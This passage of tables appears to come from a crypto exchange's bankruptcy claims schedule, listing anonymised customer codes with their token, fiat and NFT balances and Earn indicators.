| 07373452 | | BAT[0], BCH[0], BTC[0.00006469], CUSDT[7], DOGE[0], ETH[0.00832993], ETHW[0.00822049], GRT[0], SOL[0], USD[0.00], YFI[0] | Yes | |
| 07373453 | | GRT[4.34720107], USD[0.00] | | |
| 07373456 | | SHIB[1], SOL[5.65835488], TRX[4], USD[0.00] | | |
| 07373457 | | USD[10.00] | | |
| 07373458 | | USD[10.00] | | |
| 07373459 | | BCH[0], DOGE[0], LINK[0], LTC[0], PAXG[0], USD[0.00] | Yes | |
| 07373460 | | CUSDT[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373461 | | CUSDT[9], DOGE[.00003197], TRX[1], USD[0.00] | | |
| 07373462 | | DOGE[1], LTC[.04279571], USD[0.00] | | |
| 07373463 | | USD[0.00] | | |
| 07373464 | | BAT[4.43457492], BRZ[4], BTC[0], CUSDT[5], DOGE[6], GRT[5.31176252], LINK[1.07123136], LTC[0], SHIB[731.48262288], TRX[8], USD[0.01], USDT[4.33350382] | Yes | |
| 07373465 | | USD[10.00] | | |
| 07373466 | | USD[10.00] | | |
| 07373467 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07373468 | | USD[10.00] | | |
| 07373469 | | DOGE[141.31103859], USD[0.00] | | |
| 07373470 | | CUSDT[7], DOGE[4.54112921], USD[0.00] | | |
| 07373471 | | USD[0.00] | | |
| 07373473 | | BRZ[1], BTC[0], DOGE[0], TRX[0], UNI[0], USD[0.00] | | |
| 07373474 | | BAT[9.46874094], BRZ[1], DOGE[2219.19267411], USD[0.00] | | |
| 07373475 | | USD[10.00] | | |
| 07373476 | | DOGE[193.12639968], USD[0.00] | | |
| 07373477 | | BRZ[1], BTC[0], CUSDT[8], ETH[0], LINK[0], TRX[0], USD[0.00] | Yes | |
| 07373478 | | BRZ[0], BTC[0], USD[0.00], USDT[0] | | |
| 07373479 | | USD[10.00] | | |
| 07373480 | | BTC[0], SOL[.00592], USD[0.00] | | |
| 07373481 | | USD[10.00] | | |
| 07373482 | | BRZ[1], LINK[7.64591221], SUSHI[28.24794356], TRX[1], USD[0.00] | | |
| 07373483 | | BRZ[8.80391313], CUSDT[4], DOGE[12.86329007], TRX[8], USD[0.01] | Yes | |
| 07373484 | | USD[10.00] | | |
| 07373485 | | KSHIB[227.0324083], SHIB[280.10157856], TRX[1], USD[0.00] | Yes | |
| 07373486 | | BTC[.00021453], CUSDT[1], USD[0.00] | | |
| 07373487 | | BAT[0], BCH[0], BRZ[1], CUSDT[3], LTC[0], SHIB[1], USD[0.00] | Yes | |
| 07373491 | | NFT (415862081969033141/Bahrain Ticket Stub #21771)[1] | | |
| 07373492 | | USD[10.00] | | |
| 07373493 | | USD[10.00] | | |
| 07373494 | | USD[10.00] | | |
| 07373495 | | DOGE[1.05732566], USD[5.89], USDT[1] | | |
| 07373496 | | USD[10.00] | | |
| 07373497 | | USD[0.05] | | |
| 07373498 | | USD[10.00] | | |
| 07373501 | | USD[10.00] | | |
| 07373502 | | USD[10.00] | | |
| 07373504 | | AAVE[.00399366], ALGO[.00283134], BAT[.26931948], BRZ[23.13970141], CUSDT[63.2068233], DOGE[12.92518567], ETH[.00019529], ETHW[.00019529], GRT[4.15746419], LINK[.0002917], MATIC[67.88959365], SHIB[459.4405157], SOL[.00009322], SUSHI[.00084999], TRX[111.422867709], UNI[.846032511], USD[3.11], USDT[4.37383297] | Yes | |
| 07373505 | | CUSDT[1], DOGE[3], SOL[0], SUSHI[.00877626], TRX[0], USD[0.00] | | |
| 07373507 | | USD[0.02] | | |
| 07373508 | | CUSDT[1], DOGE[.00003621], USD[0.00] | Yes | |
| 07373509 | | DOGE[19.78287571], USD[0.00] | Yes | |
| 07373511 | | BRZ[1], DOGE[1052.33895214], USD[0.00] | | |
| 07373513 | | BAT[1], BRZ[1], SHIB[1], SOL[2.15996992], USD[0.20] | Yes | |
| 07373514 | | DOGE[273.75617055], USD[0.08], USDT[0] | Yes | |
| 07373515 | | BAT[8.85931813], BCH[.09599894], BTC[.00257942], CUSDT[1], DOGE[7454.85179305], ETH[.02137627], ETHW[.02137627], GRT[19.68951046], LINK[.7141121], LTC[.25875397], SOL[1.8920727], SUSHI[3.31823021], TRX[2773.67163166], UNI[.98555432], USD[0.00] | | |
| 07373516 | | SOL[.00340219], USD[23856.07], USDT[0.00000052] | | |
| 07373517 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07373519 | | DOGE[38.009389], USD[0.00] | | |
| 07373520 | | DOGE[48.57634671], USD[0.00] | | |
| 07373521 | | USD[10.00] | | |
| 07373522 | | USD[4825.89] | | |
| 07373523 | | BTC[.00000009], DOGE[4], ETH[.04170888], ETHW[.04170888], TRX[488.34342032], UNI[1.24011698], USD[0.43] | | |
| 07373525 | | USD[10.00] | | |
| 07373526 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07373527 | | BTC[.00000001], USD[0.00] | | |
| 07373529 | | USD[10.73] | Yes | |
| 07373530 | | BTC[0], CUSDT[2], DOGE[0], TRX[1], USD[0.00] | | |
| 07373531 | | DOGE[1.04958729], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373533 | | USD[10.00] | | |
| 07373534 | | USD[10.00] | | |
| 07373535 | | DOGE[0], ETH[.00238654], ETHW[.00238654], USD[0.00] | | |
| 07373536 | | CUSDT[3], DOGE[1437.48537731], GRT[1], TRX[3], USD[0.03] | | |
| 07373537 | | BAT[15.42075285], USD[0.00] | | |
| 07373538 | | USD[10.00] | | |
| 07373539 | | DOGE[1.00975261], USD[0.00] | | |
| 07373541 | | DOGE[138.43248467], USD[0.00] | | |
| 07373543 | | USD[10.00] | | |
| 07373544 | | BRZ[524.40154238], BTC[.01084815], DOGE[611.30271595], GRT[981.25283907], SHIB[3940330.79171142], SOL[.78707839], USD[0.00] | Yes | |
| 07373545 | | USD[10.00] | | |
| 07373546 | | GRT[100] | | |
| 07373547 | | CUSDT[1], USD[0.00] | Yes | |
| 07373548 | | USD[0.01] | | |
| 07373549 | | CUSDT[2], ETH[.04281909], ETHW[.04228557], SOL[1.06002637], USD[0.02] | Yes | |
| 07373550 | | DOGE[39.25246374], USD[0.00] | Yes | |
| 07373551 | | USD[9.90], USDT[0] | | |
| 07373552 | | DOGE[136.80443681], USD[0.00] | | |
| 07373553 | | USD[10.00] | | |
| 07373554 | | BRZ[0], DOGE[.00004076], USD[0.00] | | |
| 07373555 | | DOGE[1228.55010337], USD[10.00] | | |
| 07373556 | | CUSDT[1], USD[0.00] | | |
| 07373558 | | BTC[.00235647] | | |
| 07373560 | | USD[10.00] | | |
| 07373561 | | USD[10.00] | | |
| 07373563 | | DOGE[0.15579884], SUSHI[0.69443112], USD[0.00] | | |
| 07373564 | | USD[11.09] | Yes | |
| 07373565 | | BTC[0], DOGE[0], ETH[0.00154548], ETHW[0.00054548], UNI[0], USD[31.13], USDT[44.58703601] | | |
| 07373566 | | USD[10.00] | | |
| 07373567 | | USD[10.00] | | |
| 07373568 | | USD[10.00] | | |
| 07373569 | | CUSDT[7], ETH[0], ETHW[0], TRX[0], USD[0.00] | | |
| 07373570 | | USD[10.00] | | |
| 07373572 | | USD[10.00] | | |
| 07373573 | | USD[10.00] | | |
| 07373574 | | USD[0.00] | | |
| 07373575 | | DOGE[35.15948659], USD[0.00] | | |
| 07373577 | | USD[10.00] | | |
| 07373578 | | USD[10.00] | | |
| 07373579 | | USD[10.00] | | |
| 07373580 | | USD[10.00] | | |
| 07373581 | | USD[0.00] | Yes | |
| 07373582 | | DOGE[4214.35138054], TRX[1], USD[0.00] | | |
| 07373583 | | DOGE[2558.99995603], KSHIB[10.74479667], SHIB[1697320.43760899], SOL[1.00005337], USD[0.00] | | |
| 07373584 | | BRZ[1], BTC[0], CUSDT[2], DOGE[116.29846023], GRT[0], LINK[0], LTC[0], TRX[1], USD[0.00] | | |
| 07373585 | | USD[10.00] | | |
| 07373586 | | DOGE[139.00801103], USD[0.00] | | |
| 07373587 | | DOGE[424.45830265], USD[10.00] | | |
| 07373588 | | CUSDT[6], ETH[.00019738], ETHW[.00019738], USD[0.00] | Yes | |
| 07373589 | | DOGE[6], TRX[2], USD[0.02] | | |
| 07373590 | | BRZ[3], CUSDT[8], DOGE[4881.81525221], LTC[2.23644402], SOL[2.22127808], TRX[4], USD[0.00], USDT[1.11043116] | Yes | |
| 07373592 | | USD[10.00] | | |
| 07373593 | | CUSDT[1], DOGE[.00055672], USD[90.19] | | |
| 07373594 | | CUSDT[1], DOGE[134.86571353], USD[0.00] | | |
| 07373595 | | BRZ[1], SOL[0], USD[0.00] | | |
| 07373596 | | CUSDT[3], DOGE[1271.32661207], USD[0.00] | | |
| 07373598 | | USD[10.00] | | |
| 07373599 | | USDT[.0008] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373601 | | USD[0.00] | | |
| 07373602 | | BCH[0.00429900], BTC[0.00128004], DOGE[0.31427744], ETH[0.10469340], ETHW[0.10469340], LINK[1.08968], LTC[.393216], MATIC[58.516], SOL[57.61098379], SUSHI[1388.9961], TRX[2436.992], USD[276.96], USDT[0], YFI[.0026944] | | |
| 07373603 | | ETH[.00269844], ETHW[.00269844], TRX[1], USD[0.00] | | |
| 07373604 | | USD[10.00] | | |
| 07373605 | | BRZ[1], CUSDT[1], SHIB[2], TRX[5], USD[0.01] | | |
| 07373606 | | BAT[0], BRZ[3], BTC[0.00002167], CUSDT[32], DOGE[5.29376546], ETH[0.00595236], ETHW[0.00588396], GRT[1.00498957], LTC[0.15636249], MATIC[.91792922], SOL[3.17510612], TRX[6], USD[10.71], USDT[1.1077875] | Yes | |
| 07373607 | | USD[10.00] | | |
| 07373608 | | USD[10.00] | | |
| 07373609 | | USD[0.00], USDT[0] | | |
| 07373610 | | CUSDT[3], DOGE[67.65403421], TRX[66.55854009], USD[10.77] | | |
| 07373611 | | USD[10.00] | | |
| 07373612 | | CUSDT[1], DOGE[1], LTC[.00262999], UNI[.43973581], USD[0.01] | | |
| 07373613 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07373614 | | CUSDT[539.80461059], TRX[138.9555477], USD[0.00] | | |
| 07373615 | | CUSDT[8], DOGE[.00003977], USD[0.00] | Yes | |
| 07373617 | | USD[10.00] | | |
| 07373618 | | CUSDT[3], USD[0.00] | Yes | |
| 07373620 | | USD[0.00] | | |
| 07373621 | | USD[0.00] | | |
| 07373622 | | USD[10.00] | | |
| 07373623 | | USD[10.00] | | |
| 07373624 | | BAT[0], BRZ[5], CUSDT[17], DOGE[1311.53755459], GRT[0], SOL[0], TRX[4080.94200007], USD[0.00] | | |
| 07373625 | | USD[10.00] | | |
| 07373626 | | BAT[2], BRZ[3], BTC[0], CUSDT[2], DOGE[1.00001221], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07373627 | | BRZ[1], CUSDT[4], DOGE[3], USD[0.01] | | |
| 07373628 | | BTC[.00080132], CUSDT[1], DOGE[2], ETH[.01748218], ETHW[.01748218], TRX[179.72906826], USD[0.00] | | |
| 07373629 | | USD[10.00] | | |
| 07373630 | | USD[10.00] | | |
| 07373631 | | DOGE[0], USD[0.72] | | |
| 07373632 | | USD[15.00] | | |
| 07373633 | | DOGE[184.2212026], USD[0.00] | Yes | |
| 07373634 | | USD[10.00] | | |
| 07373635 | | BRZ[1], BTC[0.00364203], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07373636 | | USD[10.00] | | |
| 07373637 | | USD[10.00] | | |
| 07373638 | | ETH[0.00648237], ETHW[0.00648237], USD[0.00] | | |
| 07373640 | | BTC[0.00110046], CUSDT[3], DOGE[172.26765959], ETH[0.02128843], ETHW[0.02128843], USD[1042.12] | | |
| 07373641 | | USD[10.00] | | |
| 07373642 | | CUSDT[2], DOGE[1], TRX[2], USD[132.12] | | |
| 07373643 | | USD[10.87] | Yes | |
| 07373644 | | DOGE[123.22123979], USD[0.00] | | |
| 07373645 | | BAT[1], CUSDT[1], TRX[0], USD[0.01] | | |
| 07373646 | | BAT[2], BRZ[2], BTC[0.00072939], CUSDT[3], DOGE[247.74628841], GRT[2], SHIB[368460.83787767], TRX[8], USD[0.00] | | |
| 07373647 | | BRZ[0], BTC[0.00000109], DOGE[.00006754], GRT[0], USD[0.00] | Yes | |
| 07373648 | | BAT[.08351684], DOGE[1.58644631], TRX[1], USD[9.52] | | |
| 07373649 | | USD[10.00] | | |
| 07373650 | | DOGE[5.03272589], USD[0.00], USDT[0] | | |
| 07373651 | | TRX[73.33061032], USD[0.00] | | |
| 07373652 | | BTC[.00999], DOGE[5599], USD[201.12] | | |
| 07373653 | | USD[10.00] | | |
| 07373654 | | CUSDT[5], DOGE[1112.24420999], TRX[1], USD[0.00] | | |
| 07373655 | | USD[0.00] | | |
| 07373657 | | USD[10.00] | | |
| 07373658 | | DOGE[17.79813479], USD[0.00] | | |
| 07373659 | | USD[0.00] | | |
| 07373660 | | USD[10.00] | | |
| 07373661 | | USD[10.00] | | |
| 07373662 | | DOGE[31.74615412], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373663 | | BTC[.00739342], CUSDT[6], DOGE[5], TRX[1], USD[0.00] | | |
| 07373664 | | SHIB[10505.62734906], USD[0.00] | Yes | |
| 07373666 | | BTC[.00029176], DOGE[330.52014356], TRX[373.01388755], USD[0.00] | | |
| 07373667 | | AAVE[.03388552], USD[0.00] | | |
| 07373668 | | USD[10.00] | | |
| 07373669 | | BAT[1], BRZ[3], BTC[.29386707], CUSDT[73.03360234], DOGE[23303.60049171], ETH[3.083384], ETHW[2.89971078], LTC[3.09954207], SHIB[77079788.46319282], SOL[18.01990359], TRX[9940.40625227], USD[0.02] | Yes | |
| 07373670 | | DOGE[124.54513004], USD[0.00] | | |
| 07373671 | | BTC[0], CUSDT[1], DOGE[1], LINK[0], TRX[87.40921521], USD[0.00] | Yes | |
| 07373672 | | BRZ[0], BTC[0], CUSDT[1], DOGE[1], KSHIB[.00462112], SHIB[2], USD[0.01] | Yes | |
| 07373673 | | CUSDT[2], DOGE[2254.75736211], SOL[2.05437878], TRX[2], USD[0.00] | | |
| 07373674 | | TRX[201.40674555], USD[0.00] | | |
| 07373675 | | DOGE[0.00075980], USD[0.00] | | |
| 07373677 | | USD[10.00] | | |
| 07373678 | | BRZ[2], CUSDT[2], GRT[1], TRX[2015.24778386], USD[0.00] | | |
| 07373679 | | USD[10.00] | | |
| 07373680 | | BTC[.00704227], SHIB[2], USD[1.16] | | |
| 07373681 | | USD[9.96] | | |
| 07373682 | | SUSHI[.68620489], USD[0.00] | | |
| 07373683 | | BTC[.00218501], DOGE[.96379497], ETH[0.04555518], ETHW[0.04499162], NFT (409081361712804431/Entrance Voucher #3992)[1], NFT (459452272309552587/FTX - Off The Grid Miami #5572)[1], USD[0.00] | Yes | |
| 07373684 | | BAT[90.29657042], DOGE[4], GRT[12.05450891], SUSHI[2.43119251], TRX[1], USD[0.00] | Yes | |
| 07373685 | | DOGE[131.71508183], USD[0.00] | | |
| 07373686 | | CUSDT[1], USD[0.00] | Yes | |
| 07373688 | | BTC[0], DOGE[0], SHIB[6334813.14511283], SUSHI[0], TRX[4076.88739261], USD[0.00], USDT[0] | Yes | |
| 07373689 | | USD[10.00] | | |
| 07373690 | | USD[10.00] | | |
| 07373691 | | USD[10.00] | | |
| 07373692 | | USD[10.00] | | |
| 07373693 | | USD[10.00] | | |
| 07373694 | | DOGE[.0480353], USD[0.00] | Yes | |
| 07373696 | | USD[10.00] | | |
| 07373697 | | BTC[.02076658], CUSDT[1], DOGE[15316.70399415], TRX[1], USD[10.00] | | |
| 07373698 | | USD[0.01] | | |
| 07373699 | | USD[10.00] | | |
| 07373700 | | DOGE[501.1972811], USD[10.00] | | |
| 07373701 | | USD[2000.00] | | |
| 07373702 | | USD[10.00] | | |
| 07373703 | | LTC[.05674461], USD[0.00] | | |
| 07373704 | | NFT (376833752163314661/FTX - Off The Grid Miami #1691)[1], USD[0.00] | | |
| 07373705 | | USD[10.00] | | |
| 07373706 | | USD[10.00] | | |
| 07373707 | | USD[0.20] | Yes | |
| 07373709 | | DOGE[138.91876446], USD[0.00] | | |
| 07373711 | | USD[10.00] | | |
| 07373713 | | USD[10.00] | | |
| 07373714 | | USD[10.00] | | |
| 07373715 | | BAT[1], BRZ[3], CUSDT[1], TRX[175.40878682], USD[146.46] | | |
| 07373716 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07373718 | | USD[10.00] | | |
| 07373719 | | CUSDT[1], DOGE[137.16533031], USD[0.00] | | |
| 07373721 | | BTC[.0040248], TRX[.100192], USD[3.16], USDT[24.13485] | | |
| 07373722 | | USD[10.00] | | |
| 07373723 | | BRZ[1], USD[0.00] | | |
| 07373724 | | BRZ[4.91860388], CUSDT[26], TRX[2], USD[0.40], USDT[1] | | |
| 07373725 | | BAT[1], BRZ[7], CUSDT[36], DOGE[1.45707364], GRT[2], TRX[11.22955649], USD[0.88], USDT[1] | | |
| 07373726 | | BRZ[2], CUSDT[3], DOGE[3], SHIB[414807.15288951], USD[53.49] | Yes | |
| 07373727 | | CUSDT[2], DOGE[160.02901969], USD[0.00] | | |
| 07373728 | | USD[10.00] | | |
| 07373729 | | BTC[.0000228], NFT (560983880053156536/SolanaVirus)[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373730 | | CUSDT[1], DOGE[.00001387], USD[0.00] | | |
| 07373733 | | BAT[3], BRZ[9], CAD[0.00], CUSDT[10], DOGE[606.3040355], GRT[3], SHIB[5148536.71994314], TRX[26], UNI[1], USD[0.00], USDT[3] | | |
| 07373734 | | GRT[9.91543266], NFT (548167562587728836/Entrance Voucher #3427)[1], USD[0.00] | | |
| 07373736 | | USD[10.00] | | |
| 07373738 | | USD[10.00] | | |
| 07373739 | | DAI[9.93285578], USD[0.00] | | |
| 07373741 | | BTC[0], DOGE[0], MATIC[0], NFT (409232258667506903/Australia Ticket Stub #327)[1], NFT (472220450205996233/Sunset #313)[1], NFT (507858928129813720/APEFUEL by Almond Breeze #896)[1], SOL[0], USD[0.00], USDT[0.00000020] | | |
| 07373742 | | DOGE[28.403503], USD[8.00] | | |
| 07373745 | | DOGE[1], USD[10.37] | | |
| 07373746 | | USD[0.00] | | |
| 07373747 | | USD[10.00] | | |
| 07373748 | | BCH[.02843], BTC[.00007557], CUSDT[8], DOGE[10.59584198], ETH[.00102598], ETHW[.00102598], GRT[.00037252], LINK[.00009102], LTC[.0490084], SHIB[455855.80197772], SOL[.00251766], TRX[4], USD[4.77] | | |
| 07373749 | | BRZ[1], CUSDT[1093.02747759], DOGE[1], NFT (347311189358684046/Ape MAN#02)[1], NFT (353941887855060326/ApexDucks #311)[1], NFT (420563514684124312/2942)[1], NFT (528010197230064775/Ape MAN#01)[1], NFT (543530803640590827/Cyber Pharmacist 0656)[1], NFT (566755028612613964/Cyber Pharmacist 0741)[1], NFT (572755463450703998/3D CATPUNK #1027)[1], SOL[1.45359449], SUSHI[21.69640931], TRX[404.75120691], USD[0.00] | Yes | |
| 07373750 | | BTC[.001741], DOGE[1335.66034332], TRX[1], USD[10.00] | | |
| 07373751 | | CUSDT[1], TRX[200.31910833], USD[0.00] | | |
| 07373752 | | USD[10.00] | | |
| 07373753 | | BAT[5.0017253], CUSDT[7], DOGE[46104.02445542], GRT[4.0017253], SUSHI[1.00043135], TRX[16321.67787644], USD[26.53], USDT[4.00129397] | | |
| 07373754 | | SOL[.00000859], USD[0.00] | | |
| 07373755 | | CUSDT[3], DOGE[4], TRX[1], USD[0.01] | | |
| 07373757 | | SHIB[1], SOL[.0002262], USD[0.00], USDT[0.00000001] | Yes | |
| 07373758 | | DOGE[213.81956769], USD[0.00] | | |
| 07373759 | | USD[100.00] | | |
| 07373760 | | USD[10.00] | | |
| 07373761 | | USD[10.00] | | |
| 07373763 | | USD[10.00] | | |
| 07373764 | | CUSDT[1], DOGE[2], TRX[0], USD[0.00], USDT[0] | | |
| 07373765 | | USD[10.00] | | |
| 07373767 | | USD[10.00] | | |
| 07373768 | | USD[10.00] | | |
| 07373771 | | DOGE[0.49164886], ETH[0], NFT (336802438431186012/FTX - Off The Grid Miami #2284)[1], USD[0.00] | Yes | |
| 07373774 | | SOL[0.00893005], USD[0.00], USDT[0] | | |
| 07373775 | | DOGE[1.70211616], USD[0.00] | | |
| 07373776 | | USD[10.00] | | |
| 07373777 | | USD[10.00] | | |
| 07373778 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[0], USD[0.00] | | |
| 07373779 | | BRZ[4], CUSDT[3], USD[0.01] | | |
| 07373780 | | BTC[.02305872], CUSDT[1], DOGE[13949.53579962], ETH[.36762513], ETHW[.36747057], SHIB[15523833.35177506], SOL[9.26811854], TRX[3783.26096179], USD[0.00], YFI[.01100139] | Yes | |
| 07373781 | | USD[10.00] | | |
| 07373782 | | DOGE[53.65184214], USD[0.00] | | |
| 07373783 | | CUSDT[1], DOGE[723.07266151], USD[0.00] | | |
| 07373784 | | BAT[1], BRZ[1], DOGE[.00987775], TRX[1], USD[0.01] | | |
| 07373785 | | USD[10.00] | | |
| 07373786 | | USD[10.00] | | |
| 07373787 | | USD[10.00] | | |
| 07373788 | | USD[10.00] | | |
| 07373789 | | CUSDT[1], USD[0.00] | Yes | |
| 07373790 | | DOGE[57.77659943], USD[0.00] | | |
| 07373791 | | DOGE[1], USD[28.46] | | |
| 07373792 | | CUSDT[2], DOGE[15.16582589], USD[0.00] | | |
| 07373793 | | USD[10.00] | | |
| 07373794 | | BRZ[2], CUSDT[1], LINK[1], TRX[4], USD[0.00] | | |
| 07373795 | | DOGE[1828.18452243], USD[10.00] | | |
| 07373796 | | DOGE[1], SOL[22.35428908], TRX[3], USD[0.00] | | |
| 07373797 | | USD[10.00] | | |
| 07373798 | | TRX[217.27387622], USD[0.00] | Yes | |
| 07373799 | | USD[0.00] | | |
| 07373801 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373803 | | BTC[.00028942], USD[0.00] | | |
| 07373804 | | USD[10.00] | | |
| 07373805 | | BRZ[1], CUSDT[19], DOGE[9739.81416639], ETH[0], GRT[1.00498957], SHIB[1], TRX[2], USD[0.00], USDT[2.21668808] | Yes | |
| 07373806 | | BAT[1], DOGE[2], SOL[0], TRX[1], USD[0.00] | | |
| 07373807 | | USD[10.00] | | |
| 07373808 | | BCH[0], BRZ[0.00002600], ETH[0], GRT[0], LINK[0], USD[0.00], USDT[0], YFI[0] | | |
| 07373809 | | USD[10.00] | | |
| 07373810 | | USD[10.00] | | |
| 07373811 | | DOGE[1.00003579], USD[0.00] | | |
| 07373812 | | BAT[0], DOGE[1], ETH[0.00180599], LINK[0], SHIB[3], TRX[0.00000311], USD[0.00] | Yes | |
| 07373813 | | USD[8.02] | | |
| 07373814 | | CUSDT[1], TRX[2140.50018454], USD[0.00] | | |
| 07373815 | | CUSDT[1], DOGE[1], TRX[2], USD[0.00] | | |
| 07373816 | | USD[20.00] | | |
| 07373817 | | USD[0.00] | | |
| 07373818 | | BRZ[1], BTC[.02747963], CUSDT[1], DOGE[1], SUSHI[54.28515453], USD[10.00] | | |
| 07373819 | | DOGE[0], USD[0.00] | | |
| 07373820 | | USD[10.00] | | |
| 07373821 | | USD[0.00] | | |
| 07373822 | | BTC[.00021612], USD[0.00] | | |
| 07373823 | | USD[10.00] | | |
| 07373824 | | USD[10.00] | | |
| 07373825 | | USD[10.00] | | |
| 07373826 | | USD[10.00] | | |
| 07373827 | | USD[10.00] | | |
| 07373829 | | USD[10.00] | | |
| 07373831 | | CUSDT[3], DOGE[48.77799201], ETH[0.01093938], ETHW[0.01080258], SOL[0], TRX[187.90858779], USD[0.00] | Yes | |
| 07373832 | | BTC[.00019671], USD[0.00] | | |
| 07373833 | | DOGE[0], LINK[0], USD[0.00], USDT[.04251] | | |
| 07373834 | | CUSDT[4], DOGE[.00296679], TRX[2], USD[0.01] | | |
| 07373835 | | USD[10.00] | | |
| 07373836 | | BRZ[60.19901083], BTC[.00073685], CUSDT[5], DOGE[132.30163724], ETH[.01151919], ETHW[.01138042], KSHIB[118.34377414], SHIB[924277.38109687], USD[0.00] | Yes | |
| 07373838 | | DOGE[543.67020105], TRX[1.00018829], USD[0.00] | Yes | |
| 07373839 | | BTC[0], ETH[0], ETHW[0], MATIC[0], SHIB[2], SUSHI[0], USD[0.00] | Yes | |
| 07373840 | | BRZ[1], BTC[0], USD[0.00] | | |
| 07373841 | | BTC[.0009935], CUSDT[4], DOGE[1602.37702829], USD[0.00] | | |
| 07373842 | | USD[10.00] | | |
| 07373844 | | USD[10.00] | | |
| 07373845 | | GRT[3.52201047], USD[0.00] | | |
| 07373846 | | USD[10.00] | | |
| 07373848 | | USD[10.00] | | |
| 07373849 | | CUSDT[3], DOGE[3854.06068322], ETH[.3318113], ETHW[.33165071], GRT[58.09579103], LTC[3.87514246], SHIB[644134.84014098], SOL[13.30156822], TRX[2307.62405523], USD[0.00], USDT[1.10974169] | Yes | |
| 07373850 | | SHIB[7], TRX[1], USD[0.00], YFI[.00033489] | | |
| 07373851 | | USD[10.00] | | |
| 07373853 | | DOGE[4099.00420449], USD[10.00] | | |
| 07373854 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.00] | | |
| 07373856 | | USD[10.00] | | |
| 07373857 | | USD[10.00] | | |
| 07373859 | | DOGE[513.33445148], USD[0.00] | | |
| 07373860 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], TRX[0], USD[0.00] | | |
| 07373861 | | BRZ[1], ETH[.11619097], ETHW[.11619097], USD[10.00] | | |
| 07373862 | | DOGE[1], TRX[128.23071521], USD[0.00], USDT[0] | | |
| 07373863 | | USD[10.00] | | |
| 07373864 | | USD[10.00] | | |
| 07373865 | | USD[10.00] | | |
| 07373866 | | DOGE[7333.56301128], SHIB[19418524.04641495], USD[0.00], USDT[0] | Yes | |
| 07373867 | | USD[10.00] | | |
| 07373868 | | BRZ[2], CUSDT[12], DOGE[1039.41742793], SHIB[2], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07373869 | | USD[0.00] | | |
| 07373870 | | BAT[2.09034850], BCH[.00000001], BRZ[3], CUSDT[12], DOGE[17.32401846], ETHW[7.21007137], GRT[2.05177984], LTC[.00003086], SHIB[1], TRX[7.00008982], USD[0.00], USDT[0.00000011] | Yes | |
| 07373871 | | CUSDT[1], DOGE[1.00001956], USD[9.67] | | |
| 07373872 | | CUSDT[2], DOGE[.00000405], USD[52.94] | Yes | |
| 07373873 | | DOGE[.00702141], USD[0.00] | Yes | |
| 07373874 | | BRZ[3], CUSDT[2], DOGE[1], TRX[3], USD[0.00], USDT[1] | | |
| 07373875 | | USD[10.00] | | |
| 07373877 | | USD[10.00] | | |
| 07373878 | | BRZ[1], CUSDT[4], TRX[3], USD[221.41] | | |
| 07373879 | | BTC[0.03259789], ETH[34.51720138], ETHW[34.61720138], NFT (486312619276912566/SBF Hair & Signature #2 #102][1], SOL[0], USD[0.00] | | |
| 07373881 | | BTC[.00019422], USD[0.00] | | |
| 07373882 | | USD[10.00] | | |
| 07373883 | | NFT (302041133556187267/Entrance Voucher #3340)[1], USD[1.13], USDT[0] | | |
| 07373884 | | BRZ[1.1102563], BTC[0], DOGE[0], USD[0.00] | | |
| 07373886 | | CUSDT[5], TRX[1], USD[0.01] | | |
| 07373887 | | USD[0.00] | | |
| 07373888 | | USD[10.00] | | |
| 07373889 | | CUSDT[3], USD[0.12] | | |
| 07373890 | | USD[10.00] | | |
| 07373892 | | SOL[.0000006], USD[0.00] | Yes | |
| 07373895 | | USD[10.00] | | |
| 07373896 | | USD[10.00] | | |
| 07373897 | | DOGE[133.74458902], USD[0.00] | | |
| 07373898 | | BTC[.00000001], USD[0.00] | | |
| 07373901 | | USD[10.00] | | |
| 07373902 | | SHIB[2317955.32481255], USD[0.00] | Yes | |
| 07373903 | | BRZ[2], BTC[.17074423], CUSDT[4], DOGE[2322.76028028], ETH[0.78465561], ETHW[0.78465561], KSHIB[4055.81285181], LINK[21.44142099], SHIB[1328903.65448504], SOL[.00003598], TRX[1937.63710246], USD[0.69], USDT[0.00002793] | | |
| 07373906 | | USD[10.00] | | |
| 07373908 | | USD[10.00] | | |
| 07373909 | | BTC[.00000864], SHIB[519648.33619492], USD[0.00] | Yes | |
| 07373910 | | BRZ[1], CUSDT[5], DOGE[111.82079376], TRX[1], USD[0.00] | Yes | |
| 07373911 | | DOGE[0], ETH[.00000013], ETHW[.00000013], LINK[0], LTC[0], TRX[1], USD[0.00] | Yes | |
| 07373912 | | USD[10.00] | | |
| 07373913 | | CUSDT[2], DOGE[3], USD[10.00] | | |
| 07373914 | | USD[10.00] | | |
